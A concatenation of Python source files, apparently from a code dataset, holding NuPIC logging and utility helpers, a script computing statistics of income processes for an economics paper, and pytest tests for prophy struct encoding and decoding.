arg_class = None
args = inspect.getargvalues(f)
if len(args[0]) > 0:
arg_name = args[0][0] # potentially the 'self' arg if its a method
arg_class = args[3][arg_name].__class__.__name__
return (method_name, filename, arg_class)
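# Illustrative sketch, not part of the original module (the class below is
# ours): getCallerInfo(depth=1) reports on the frame of the method that calls
# it, including the class name taken from the 'self' argument.
class _ExampleCaller(object):
  def whoAmI(self):
    # expected: ('whoAmI', <path of this file>, '_ExampleCaller')
    return getCallerInfo(depth=1)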
#############################################################################
def title(s=None, additional='', stream=sys.stdout, frame='-'):
"""Utility function to display nice titles
It automatically extracts the name of the function/method it is called from
and you can add additional text. title() will then print the name
  of the function/method and the additional text surrounded by two lines
of dashes. If you don't want the name of the function, you can provide
alternative text (regardless of the additional text)
@param s - text to display, uses the function name and arguments by default
@param additional - extra text to display (not needed if s is not None)
  @param stream - the stream to print to. By default goes to standard output
@param frame - the character used for the over and under line. Default is '-'
Examples:
def foo():
title()
will display:
---
foo
---
def foo():
title(additional='(), this is cool!!!')
will display:
----------------------
foo(), this is cool!!!
----------------------
def foo():
title('No function name here!')
will display:
----------------------
No function name here!
----------------------
"""
if s is None:
callable_name, file_name, class_name = getCallerInfo(2)
s = callable_name
if class_name is not None:
method_name = s
s = class_name + '.' + callable_name
lines = (s + additional).split('\n')
length = max(len(line) for line in lines)
  print >> stream, frame * length
  print >> stream, s + additional
  print >> stream, frame * length
#############################################################################
def bringToFront(title):
"""Bring a top-level window with a given title
to the front on Windows"""
if sys.platform != 'win32':
return
import ctypes
find_window = ctypes.windll.user32.FindWindowA
set_foreground_window = ctypes.windll.user32.SetForegroundWindow
hwnd = find_window(None, title)
if hwnd == 0:
raise Exception('There is no window titled: "%s"' % title)
set_foreground_window(hwnd)
#############################################################################
def getUserDocumentsPath():
"""
Find the user's "Documents" directory (OS X), "My Documents" directory
(Windows), or home directory (Unix).
"""
# OS X and Windows code from:
# http://www.blueskyonmars.com/2005/08/05
# /finding-a-users-my-documents-folder-on-windows/
# Alternate Windows code from:
# http://bugs.python.org/issue1763
if sys.platform.startswith('win'):
if sys.platform.startswith('win32'):
# Try the primary method on 32-bit windows
try:
from win32com.shell import shell
alt = False
except ImportError:
try:
import ctypes
dll = ctypes.windll.shell32
alt = True
except:
raise Exception("Could not find 'My Documents'")
else:
# Use the alternate method on 64-bit Windows
alt = True
if not alt:
# Primary method using win32com
df = shell.SHGetDesktopFolder()
pidl = df.ParseDisplayName(0, None,
"::{450d8fba-ad25-11d0-98a8-0800361b1103}")[1]
path = shell.SHGetPathFromIDList(pidl)
else:
# Alternate method using ctypes rather than win32com
buf = ctypes.create_string_buffer(300)
dll.SHGetSpecialFolderPathA(None, buf, 0x0005, False)
path = buf.value
elif sys.platform.startswith('darwin'):
from Carbon import Folder, Folders
folderref = Folder.FSFindFolder(Folders.kUserDomain,
Folders.kDocumentsFolderType,
False)
path = folderref.as_pathname()
else:
path = os.getenv('HOME')
return path
#############################################################################
def getArgumentDescriptions(f):
"""
Get the arguments, default values, and argument descriptions for a function.
Returns a list of tuples: (argName, argDescription, defaultValue). If an
argument has no default value, the tuple is only two elements long (as None
cannot be used, since it could be a default value itself).
Parses the argument descriptions out of the function docstring, using a
  format something like this:
[junk]
argument_name: description...
description...
description...
[junk]
[more arguments]
It will find an argument as long as the exact argument name starts the line.
It will then strip a trailing colon, if present, then strip the rest of the
line and use it to start the description. It will then strip and append any
subsequent lines with a greater indent level than the original argument name.
"""
# Get the argument names and default values
argspec = inspect.getargspec(f)
# Scan through the docstring to extract documentation for each argument as
# follows:
# Check the first word of the line, stripping a colon if one is present.
# If it matches an argument name:
  #   Take the rest of the line, stripping leading whitespace
# Take each subsequent line if its indentation level is greater than the
# initial indentation level
# Once the indentation level is back to the original level, look for
# another argument
docstring = f.__doc__
descriptions = {}
if docstring:
lines = docstring.split('\n')
i = 0
while i < len(lines):
stripped = lines[i].lstrip()
if not stripped:
i += 1
continue
# Indentation level is index of the first character
indentLevel = lines[i].index(stripped[0])
# Get the first word and remove the colon, if present
firstWord = stripped.split()[0]
if firstWord.endswith(':'):
firstWord = firstWord[:-1]
if firstWord in argspec.args:
# Found an argument
argName = firstWord
restOfLine = stripped[len(firstWord)+1:].strip()
argLines = [restOfLine]
# Take the next lines as long as they are indented more
i += 1
while i < len(lines):
stripped = lines[i].lstrip()
if not stripped:
# Empty line - stop
break
if lines[i].index(stripped[0]) <= indentLevel:
# No longer indented far enough - stop
break
# This line counts too
argLines.append(lines[i].strip())
i += 1
# Store this description
descriptions[argName] = ' '.join(argLines)
else:
# Not an argument
i += 1
# Build the list of (argName, description, defaultValue)
args = []
if argspec.defaults:
defaultCount = len(argspec.defaults)
else:
defaultCount = 0
nonDefaultArgCount = len(argspec.args) - defaultCount
for i, argName in enumerate(argspec.args):
if i >= nonDefaultArgCount:
defaultValue = argspec.defaults[i - nonDefaultArgCount]
args.append((argName, descriptions.get(argName, ""), defaultValue))
else:
args.append((argName, descriptions.get(argName, "")))
return args
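# Illustrative sketch, not part of the original module (the function below is
# ours): a docstring written in the format that getArgumentDescriptions()
# parses.
def _exampleDocumentedFunction(alpha, beta=3):
  """
  alpha: the first operand; this description
         continues on a more indented line
  beta: the second operand
  """
  return alpha + beta
# getArgumentDescriptions(_exampleDocumentedFunction) should yield roughly
# [('alpha', 'the first operand; ...'), ('beta', 'the second operand', 3)].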
#############################################################################
# TODO queryNumInwardIters appears to be unused and should probably be deleted
# from here altogether; it's likely an artifact of the legacy vision support.
#def queryNumInwardIters(configPath, radialLength, numRepetitions=1):
# """
# Public utility API that accepts a config path and
# radial length, and determines the proper number of
# training iterations with which to invoke net.run()
# when running a PictureSensor in 'inward' mode.
# """
# numCats = queryNumCategories(configPath)
# sequenceLen = radialLength + 1
# numItersPerCat = (8 * radialLength) * sequenceLen
# numTrainingItersTP = numItersPerCat * numCats
# return numTrainingItersTP * numRepetitions
#############################################################################
gLoggingInitialized = False
def initLogging(verbose=False, console='stdout', consoleLevel='DEBUG'):
"""
  Initialize NuPic logging by reading in the logging configuration file. The
logging configuration file is named 'nupic-logging.conf' and is expected to be
in the format defined by the python logging module.
If the environment variable 'NTA_CONF_PATH' is defined, then the logging
configuration file is expected to be in the NTA_CONF_PATH directory. If
NTA_CONF_PATH is not defined, then it is found in the 'conf/default'
subdirectory of the NuPic installation directory (typically
~/nupic/current/conf/default)
The logging configuration file can use the environment variable 'NTA_LOG_DIR'
to set the locations of log files. If this variable is not defined, logging to
files will be disabled.
console: Defines console output for the default "root" logging
configuration; this may be one of 'stdout', 'stderr', or None;
Use None to suppress console logging output
consoleLevel:
Logging-level filter string for console output corresponding to
logging levels in the logging module; may be one of:
'DEBUG', 'INFO', 'WARNING', 'ERROR', or 'CRITICAL'.
              E.g., a value of 'WARNING' suppresses DEBUG and INFO level output
to console, but allows WARNING, ERROR, and CRITICAL
"""
# NOTE: If you call this twice from the same process there seems to be a
# bug - logged messages don't show up for loggers that you do another
# logging.getLogger() on.
global gLoggingInitialized
if gLoggingInitialized:
if verbose:
print >> sys.stderr, "Logging already initialized, doing nothing."
return
consoleStreamMappings = {
'stdout' : 'stdoutConsoleHandler',
'stderr' : 'stderrConsoleHandler',
}
consoleLogLevels = ['DEBUG', 'INFO', 'WARNING', 'WARN', 'ERROR', 'CRITICAL',
'FATAL']
assert console is None or console in consoleStreamMappings.keys(), (
'Unexpected console arg value: %r') % (console,)
assert consoleLevel in consoleLogLevels, (
'Unexpected consoleLevel arg value: %r') % (consoleLevel)
# -----------------------------------------------------------------------
# Setup logging. Look for the nupic-logging.conf file, first in the
# NTA_CONFIG_DIR path (if defined), then in a subdirectory of the nupic
# module
configFilename = 'nupic-logging.conf'
configFilePath = resource_filename("nupic.support", configFilename)
configLogDir = os.environ.get('NTA_LOG_DIR', None)
# Load in the logging configuration file
if verbose:
print >> sys.stderr, (
"Using logging configuration file: %s") % (configFilePath)
# This dict will hold our replacement strings for logging configuration
replacements = dict()
def makeKey(name):
""" Makes replacement key """
return "$$%s$$" % (name)
platform = sys.platform.lower()
if platform.startswith('java'):
# Jython
import java.lang
platform = java.lang.System.getProperty("os.name").lower()
if platform.startswith('mac os x'):
platform = 'darwin'
if platform.startswith('darwin'):
replacements[makeKey('SYSLOG_HANDLER_ADDRESS')] = '"/var/run/syslog"'
elif platform.startswith('linux'):
replacements[makeKey('SYSLOG_HANDLER_ADDRESS')] = '"/dev/log"'
else:
raise RuntimeError("This platform is neither darwin nor linux: %s" % (
sys.platform,))
# Nupic logs go to file
replacements[makeKey('PERSISTENT_LOG_HANDLER')] = 'fileHandler'
replacements[makeKey('FILE_HANDLER_LOG_FILENAME')] = '"/dev/null"'
# Set up log file path for the default file handler and configure handlers
handlers = list()
if configLogDir is not None:
logFilePath = _genLoggingFilePath()
makeDirectoryFromAbsolutePath(os.path.dirname(logFilePath))
replacements[makeKey('FILE_HANDLER_LOG_FILENAME')] = repr(logFilePath)
handlers.append(replacements[makeKey('PERSISTENT_LOG_HANDLER')])
if console is not None:
handlers.append(consoleStreamMappings[console])
replacements[makeKey('ROOT_LOGGER_HANDLERS')] = ", ".join(handlers)
# Set up log level for console handlers
replacements[makeKey('CONSOLE_LOG_LEVEL')] = consoleLevel
customConfig = StringIO()
# Using pkg_resources to get the logging file, which should be packaged and
# associated with this source file name.
loggingFileContents = resource_string(__name__, configFilename)
for lineNum, line in enumerate(loggingFileContents.splitlines()):
if "$$" in line:
for (key, value) in replacements.items():
line = line.replace(key, value)
# If there is still a replacement string in the line, we're missing it
# from our replacements dict
if "$$" in line and "$$<key>$$" not in line:
raise RuntimeError(("The text %r, found at line #%d of file %r, "
"contains a string not found in our replacement "
"dict.") % (line, lineNum, configFilePath))
customConfig.write("%s\n" % line)
customConfig.seek(0)
if python_version()[:3] >= '2.6':
logging.config.fileConfig(customConfig, disable_existing_loggers=False)
else:
logging.config.fileConfig(customConfig)
gLoggingInitialized = True
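# Illustrative usage, not part of the original module: a typical one-time call
# at application start. With these example arguments, WARNING and above go to
# stderr; file logging is only enabled when NTA_LOG_DIR is defined.
def _exampleInitLogging():
  initLogging(console='stderr', consoleLevel='WARNING')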
#############################################################################
def reinitLoggingDir():
""" (Re-)Initialize the loging directory for the calling application that
uses initLogging() for logging configuration
NOTE: It's typially unnecessary to call this function directly since
initLogging takes care of it for you. This function is exposed primarily for
the benefit of nupic-services.py to allow it to restore its logging directory
after the hard-reset operation.
"""
if gLoggingInitialized and 'NTA_LOG_DIR' in os.environ:
makeDirectoryFromAbsolutePath(os.path.dirname(_genLoggingFilePath()))
#############################################################################
def _genLoggingFilePath():
""" Generate a filepath for the calling app """
appName = os.path.splitext(os.path.basename(sys.argv[0]))[0] or 'UnknownApp'
appLogDir = os.path.abspath(os.path.join(
os.environ['NTA_LOG_DIR'],
'numenta-logs-%s' % (os.environ['USER'],),
appName))
appLogFileName = '%s-%s-%s.log' % (
appName, long(time.mktime(time.gmtime())), os.getpid())
return os.path.join(appLogDir, appLogFileName)
#############################################################################
def enableLoggingErrorDebugging():
""" Overrides the python logging facility's Handler.handleError function to
raise an exception instead of print and suppressing it. This allows a deeper
stacktrace to be emitted that is very helpful for quickly finding the
file/line that initiated the invalidly-formatted logging operation.
NOTE: This is for debugging only - be sure to remove the call to this function
*before* checking in your changes to the source code repository, as it will
cause the application to fail if some invalidly-formatted logging statement
still exists in your code.
Example usage: enableLoggingErrorDebugging must be called *after*
initLogging()
import nupic.support
nupic.support.initLogging()
nupic.support.enableLoggingErrorDebugging()
"TypeError: not all arguments converted during string formatting" is an
example exception that might be output by the built-in handlers with the
following very shallow traceback that doesn't go deep enough to show the
source of the problem:
File ".../python2.6/logging/__init__.py", line 776, in emit
msg = self.format(record)
File ".../python2.6/logging/__init__.py", line 654, in format
return fmt.format(record)
File ".../python2.6/logging/__init__.py", line 436, in format
record.message = record.getMessage()
File ".../python2.6/logging/__init__.py", line 306, in getMessage
msg = msg % self.args
TypeError: not all arguments converted during string formatting
"""
print >> sys.stderr, ("WARNING")
print >> sys.stderr, ("WARNING: "
"nupic.support.enableLoggingErrorDebugging() was "
"called to install a debugging patch into all logging handlers that "
"will cause the program to fail if a logging exception occurrs; this "
"call is for debugging only and MUST be removed before checking in code "
"into production system. Caller: %s") % (
traceback.format_stack(),)
print >> sys.stderr, ("WARNING")
def handleErrorPatch(*args, **kwargs):
if logging.raiseExceptions:
raise
for handler in logging._handlerList:
handler.handleError = handleErrorPatch
return
#############################################################################
def clippedObj(obj, maxElementSize=64):
"""
  Return a clipped version of obj suitable for printing. This
  is useful when generating log messages by printing data structures, where you
  don't want the message to be too long.
If passed in a dict, list, or namedtuple, each element of the structure's
string representation will be limited to 'maxElementSize' characters. This
will return a new object where the string representation of each element
has been truncated to fit within maxElementSize.
"""
# Is it a named tuple?
if hasattr(obj, '_asdict'):
obj = obj._asdict()
# Printing a dict?
if isinstance(obj, dict):
objOut = dict()
for key,val in obj.iteritems():
objOut[key] = clippedObj(val)
# Printing a list?
elif hasattr(obj, '__iter__'):
objOut = []
for val in obj:
objOut.append(clippedObj(val))
# Some other object
else:
objOut = str(obj)
if len(objOut) > maxElementSize:
objOut = objOut[0:maxElementSize] + '...'
return objOut
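# Illustrative example, not part of the original module: clipping a long
# string before logging it; the value and limit below are arbitrary.
def _exampleClippedObj():
  longMessage = 'x' * 500
  # returns the first 32 characters followed by '...'
  return clippedObj(longMessage, maxElementSize=32)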
###############################################################################
def intTo8ByteArray(inValue):
"""
  Converts an int to a packed byte array, with the most significant byte first
"""
values = (
(inValue >> 56 ) & 0xff,
(inValue >> 48 ) & 0xff,
(inValue >> 40 ) & 0xff,
(inValue >> 32 ) & 0xff,
(inValue >> 24 ) & 0xff,
(inValue >> 16 ) & 0xff,
(inValue >> 8 ) & 0xff,
inValue & 0xff
)
s = struct.Struct('B B B B B B B B')
packed_data = s.pack(*values)
return packed_data
###############################################################################
def byteArrayToInt(packed_data):
"""
Converts a byte array into an integer
"""
value = struct.unpack('B B B B B B B B', packed_data)
return value[0] << 56 | \
value[1] << 48 | \
value[2] << 40 | \
value[3] << 32 | \
value[4] << 24 | \
value[5] << 16 | \
value[6] << 8 | \
value[7]
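# Illustrative round trip, not part of the original module: intTo8ByteArray()
# and byteArrayToInt() are inverses for any unsigned value that fits in 8 bytes.
def _exampleByteArrayRoundTrip():
  original = 0x0102030405060708
  packed = intTo8ByteArray(original)  # '\x01\x02\x03\x04\x05\x06\x07\x08'
  assert byteArrayToInt(packed) == original
  return packed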
###############################################################################
def getSpecialRowID():
"""
Special row id is 0xFF FFFF FFFF FFFF FFFF (9 bytes of 0xFF)
"""
values = (0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF)
s = struct.Struct('B B B B B B B B B')
packed_data = s.pack(*values)
return packed_data
################################################################################
_FLOAT_SECONDS_IN_A_DAY = 24.0 * 60.0 * 60.0
def floatSecondsFromTimedelta(td):
""" Convert datetime.timedelta to seconds in floating point """
sec = (td.days * _FLOAT_SECONDS_IN_A_DAY + td.seconds * 1.0 +
td.microseconds / 1E6)
return sec
#############################################################################
def aggregationToMonthsSeconds(interval):
"""
Return the number of months and seconds from an aggregation dict that
represents a date and time.
Interval is a dict that contain one or more of the following keys: 'years',
'months', 'weeks', 'days', 'hours', 'minutes', seconds', 'milliseconds',
'microseconds'.
Parameters:
---------------------------------------------------------------------
interval: The aggregation interval, as a dict representing a date and time
retval: number of months and seconds in the interval, as a dict:
{months': XX, 'seconds': XX}. The seconds is
a floating point that can represent resolutions down to a
microsecond.
For example:
aggregationMicroseconds({'years': 1, 'hours': 4, 'microseconds':42}) ==
{'months':12, 'seconds':14400.000042}
"""
seconds = interval.get('microseconds', 0) * 0.000001
seconds += interval.get('milliseconds', 0) * 0.001
seconds += interval.get('seconds', 0)
seconds += interval.get('minutes', 0) * 60
seconds += interval.get('hours', 0) * 60 * 60
seconds += interval.get('days', 0) * 24 * 60 * 60
seconds += interval.get('weeks', 0) * 7 * 24 * 60 * 60
months = interval.get('months', 0)
months += 12 * interval.get('years', 0)
return {'months': months, 'seconds': seconds}
#############################################################################
def aggregationDivide(dividend, divisor):
"""
Return the result from dividing two dicts that represent date and time.
Both dividend and divisor are dicts that contain one or more of the following
keys: 'years', 'months', 'weeks', 'days', 'hours', 'minutes', seconds',
'milliseconds', 'microseconds'.
Parameters:
---------------------------------------------------------------------
dividend: The numerator, as a dict representing a date and time
divisor: the denominator, as a dict representing a date and time
retval: number of times divisor goes into dividend, as a floating point
number.
For example:
aggregationDivide({'hours': 4}, {'minutes': 15}) == 16
"""
  # Convert each into months and seconds
dividendMonthSec = aggregationToMonthsSeconds(dividend)
divisorMonthSec = aggregationToMonthsSeconds(divisor)
# It is a usage error to mix both months and seconds in the same operation
if (dividendMonthSec['months'] != 0 and divisorMonthSec['seconds'] != 0) \
or (dividendMonthSec['seconds'] != 0 and divisorMonthSec['months'] != 0):
raise RuntimeError("Aggregation dicts with months/years can only be "
"inter-operated with other aggregation dicts that contain "
"months/years")
if dividendMonthSec['months'] > 0:
return float(dividendMonthSec['months']) / divisor['months']
else:
return float(dividendMonthSec['seconds']) / divisorMonthSec['seconds']
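# Illustrative worked example, not part of the original module, matching the
# docstring above: 4 hours is 14400 seconds and 15 minutes is 900 seconds,
# so the quotient is 16.0.
def _exampleAggregationDivide():
  return aggregationDivide({'hours': 4}, {'minutes': 15})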
| gpl-3.0 | 4,127,680,152,068,990,000 | 33.479306 | 80 | 0.6412 | false |
ozak/BoundedConsumption | scripts/incomeprocs.py | 1 | 2312 | #!/usr/bin/env python
# coding: utf-8
'''
======================================================
Author: Ömer Özak, 2013--2014 (ozak at smu.edu)
Website: http://omerozak.com
GitHub: https://github.com/ozak/BoundedConsumption
======================================================
# This code computes statistics for the income processes used in:
# Howitt, Peter and Özak, Ömer, "Adaptive Consumption Behavior" Journal of Economic Dynamics and Control, 2014, Vol. 39: 37-61 (http://dx.doi.org/10.1016/j.jedc.2013.11.003)
# Author: Ömer Özak
# email: ozak (at) smu.edu
# Date: April 2013
'''
from __future__ import division
import numpy as np
from random import uniform
from scipy.stats import kurtosis, skew
import time,sys,os
# Seed the random number generator
np.random.seed(100)
# Sampling function
def sample(phi):
"""Returns i with probability phi[i], where phi is an
array (e.g., list or tuple)."""
a = 0.0
U = uniform(0,1)
for i in range(len(phi)):
if a < U <= a + phi[i]:
return i
a = a + phi[i]
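# Illustrative check, not part of the original script (the helper is ours):
# for large n the empirical frequencies of sample() should approximate phi.
def sample_frequencies(phi, n=10000):
    draws = np.array([sample(phi) for i in range(n)])
    return np.bincount(draws, minlength=len(phi)) / float(n)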
# Income process 1
y1=np.array([.7,1,1.3])
p1=np.array([.2,.6,.2])
# Income process 2
y2=2*y1
p2=np.array([.2,.6,.2])
# Income process 3
y3=np.array([1,1.4,2,4.1])
p3=np.array([.1,.2,.6,.1])
# Income process 4
y4=np.array([0.3,0.7,1,2.1])
p4=np.array([0.05,0.25,0.6,0.1])
# Income process 5
y5=np.array([0.1,0.7,1,1.3,1.])
p5=np.array([0.05,0.15,0.6,0.15,0.05])
# Basic stats
# For each income process generate a sample of 100000 to approximate distribution and use python tools
n=100000
y=np.array(y1[[sample(p1) for i in range(n)]])
print 'Income Process & Mean & Std & Kurtosis & Skewness\\\\'
print('$Y^1$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y2[[sample(p2) for i in range(n)]])
print('$Y^2$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y3[[sample(p3) for i in range(n)]])
print('$Y^3$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y4[[sample(p4) for i in range(n)]])
print('$Y^4$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y5[[sample(p5) for i in range(n)]])
print('$Y^5$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
| gpl-3.0 | -6,109,726,453,913,041,000 | 33.939394 | 173 | 0.588031 | false |
cislaa/prophy | prophy/tests/test_struct.py | 1 | 17273 | import prophy
import pytest
@pytest.fixture(scope = 'session')
def Struct():
class Struct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.u32),
("y", prophy.u32)]
return Struct
@pytest.fixture(scope = 'session')
def NestedStruct(Struct):
class NestedStruct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", Struct),
("b", Struct)]
return NestedStruct
@pytest.fixture(scope = 'session')
def DeeplyNestedStruct(NestedStruct, Struct):
class DeeplyNestedStruct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("m", NestedStruct),
("n", Struct),
("o", prophy.u32)]
return DeeplyNestedStruct
def test_struct_assignment(Struct):
x = Struct()
assert x.x == 0
assert x.y == 0
x.x = 3
x.y = 5
with pytest.raises(Exception):
x.nonexistent
with pytest.raises(Exception):
x.nonexistent = 10
y = Struct()
y.x = 9
y.y = 9
y.copy_from(x)
assert y.x == 3
assert y.y == 5
with pytest.raises(Exception):
y.copy_from("123")
with pytest.raises(Exception):
y.copy_from(123)
def test_struct_print(Struct):
x = Struct()
x.x = 1
x.y = 2
assert str(x) == ("x: 1\n"
"y: 2\n")
def test_struct_encode(Struct):
x = Struct()
x.x = 1
x.y = 2
assert x.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02")
def test_struct_decode(Struct):
x = Struct()
x.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"), ">")
assert x.x == 1
assert x.y == 2
def test_nested_struct_assignment(NestedStruct):
x = NestedStruct()
assert x.a.x == 0
assert x.a.y == 0
assert x.b.x == 0
assert x.b.y == 0
x.a.x = 1
x.a.y = 2
x.b.x = 3
x.b.y = 4
assert x.a.x == 1
assert x.a.y == 2
assert x.b.x == 3
assert x.b.y == 4
y = NestedStruct()
y.a.x = 8
y.a.y = 7
y.b.x = 6
y.b.y = 5
y.copy_from(x)
assert y.a.x == 1
assert y.a.y == 2
assert y.b.x == 3
assert y.b.y == 4
def test_nested_struct_print(NestedStruct):
y = NestedStruct()
y.a.x = 1
y.a.y = 2
y.b.x = 3
y.b.y = 4
assert str(y) == ("a {\n"
" x: 1\n"
" y: 2\n"
"}\n"
"b {\n"
" x: 3\n"
" y: 4\n"
"}\n"
)
def test_nested_struct_encode(NestedStruct):
y = NestedStruct()
y.a.x = 1
y.a.y = 2
y.b.x = 3
y.b.y = 4
assert y.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04")
def test_nested_struct_decode(NestedStruct):
y = NestedStruct()
y.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"), ">")
assert y.a.x == 1
assert y.a.y == 2
assert y.b.x == 3
assert y.b.y == 4
def test_deeply_nested_struct_assignment(DeeplyNestedStruct):
x = DeeplyNestedStruct()
assert x.m.a.x == 0
assert x.m.a.y == 0
assert x.m.b.x == 0
assert x.m.b.y == 0
assert x.n.x == 0
assert x.n.y == 0
assert x.o == 0
x.m.a.x = 1
x.m.a.y = 2
x.m.b.x = 3
x.m.b.y = 4
x.n.x = 5
x.n.y = 6
x.o = 7
assert x.m.a.x == 1
assert x.m.a.y == 2
assert x.m.b.x == 3
assert x.m.b.y == 4
assert x.n.x == 5
assert x.n.y == 6
assert x.o == 7
with pytest.raises(Exception):
x.m = 10
y = DeeplyNestedStruct()
y.m.a.x = 8
y.m.a.y = 7
y.m.b.x = 6
y.m.b.y = 5
y.n.x = 4
y.n.y = 3
y.o = 2
y.copy_from(x)
assert y.m.a.x == 1
assert y.m.a.y == 2
assert y.m.b.x == 3
assert y.m.b.y == 4
assert y.n.x == 5
assert y.n.y == 6
assert y.o == 7
def test_deeply_nested_struct_print(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.m.a.x = 1
z.m.a.y = 2
z.m.b.x = 3
z.m.b.y = 4
z.n.x = 5
z.n.y = 6
z.o = 7
assert str(z) == ("m {\n"
" a {\n"
" x: 1\n"
" y: 2\n"
" }\n"
" b {\n"
" x: 3\n"
" y: 4\n"
" }\n"
"}\n"
"n {\n"
" x: 5\n"
" y: 6\n"
"}\n"
"o: 7\n")
def test_deeply_nested_struct_encode(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.m.a.x = 1
z.m.a.y = 2
z.m.b.x = 3
z.m.b.y = 4
z.n.x = 5
z.n.y = 6
z.o = 7
assert z.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"
b"\x00\x00\x00\x05"
b"\x00\x00\x00\x06"
b"\x00\x00\x00\x07")
def test_deeply_nested_struct_decode(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"
b"\x00\x00\x00\x05"
b"\x00\x00\x00\x06"
b"\x00\x00\x00\x07"), ">")
assert z.m.a.x == 1
assert z.m.a.y == 2
assert z.m.b.x == 3
assert z.m.b.y == 4
assert z.n.x == 5
assert z.n.y == 6
assert z.o == 7
def test_empty_struct():
class Empty(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = []
x = Empty()
assert "" == str(x)
assert b"" == x.encode(">")
assert 0 == x.decode("", ">")
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", Empty)]
x = X()
assert """\
a {
}
""" == str(x)
assert b"" == x.encode(">")
assert 0 == x.decode("", ">")
def test_struct_with_dynamic_fields():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.u32)]
assert X._SIZE == 8
x = X()
x.x[:] = [1, 2, 3]
x.y = 4
assert b'\x03\x00\x00\x00\x01\x02\x03\x00\x04\x00\x00\x00' == x.encode('<')
x.decode(b'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00', '<')
assert x.x[:] == [1]
assert x.y == 8
def test_struct_with_many_arrays():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y_len", prophy.u16),
("y", prophy.array(prophy.u16, bound = "y_len")),
("z_len", prophy.u8),
("z", prophy.array(prophy.u64, bound = "z_len"))]
x = X()
x.x[:] = [1, 2, 3, 4, 5]
x.y[:] = [1, 2]
x.z[:] = [1, 2, 3]
assert (b"\x00\x00\x00\x05"
b"\x01\x02\x03\x04"
b"\x05\x00"
b"\x00\x02\x00\x01"
b"\x00\x02"
b"\x03\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x02"
b"\x00\x00\x00\x00\x00\x00\x00\x03") == x.encode('>')
def test_struct_with_many_arrays_mixed():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("y_len", prophy.u16),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.array(prophy.u16, bound = "y_len"))]
x = X()
x.x[:] = [1, 2, 3, 4, 5]
x.y[:] = [1, 2]
assert (b"\x00\x00\x00\x05"
b"\x00\x02"
b"\x01\x02\x03\x04"
b"\x05\x00"
b"\x00\x01\x00\x02") == x.encode('>')
def test_struct_with_many_arrays_padding():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u8),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y_len", prophy.u32),
("y", prophy.array(prophy.u8, bound = "y_len")),
("z", prophy.u64)]
class Y(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.u8),
("y", X)]
x = Y()
x.x = 1
x.y.x[:] = [2, 3]
x.y.y[:] = [4, 5]
x.y.z = 6
assert x.encode('>') == (b'\x01\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x02\x02\x03\x00'
b'\x00\x00\x00\x02'
b'\x04\x05\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06')
x.decode(b'\x05\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x04\x02\x03\x04'
b'\x05\x00\x00\x00'
b'\x00\x00\x00\x03'
b'\x04\x05\x06\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06', '>')
assert x.x == 5
assert x.y.x == [2, 3, 4, 5]
assert x.y.y == [4, 5, 6]
assert x.y.z == 6
def test_struct_with_many_arrays_fixed_tail():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u8),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.u32),
("z", prophy.u64)]
x = X()
x.x[:] = [2, 3]
x.y = 4
x.z = 5
assert x.encode('>') == (b'\x02\x02\x03\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x04'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x05')
x.decode((b'\x04\x06\x07\x08'
b'\x09\x00\x00\x00'
b'\x00\x00\x00\x05'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06'), '>')
assert x.x == [6, 7, 8, 9]
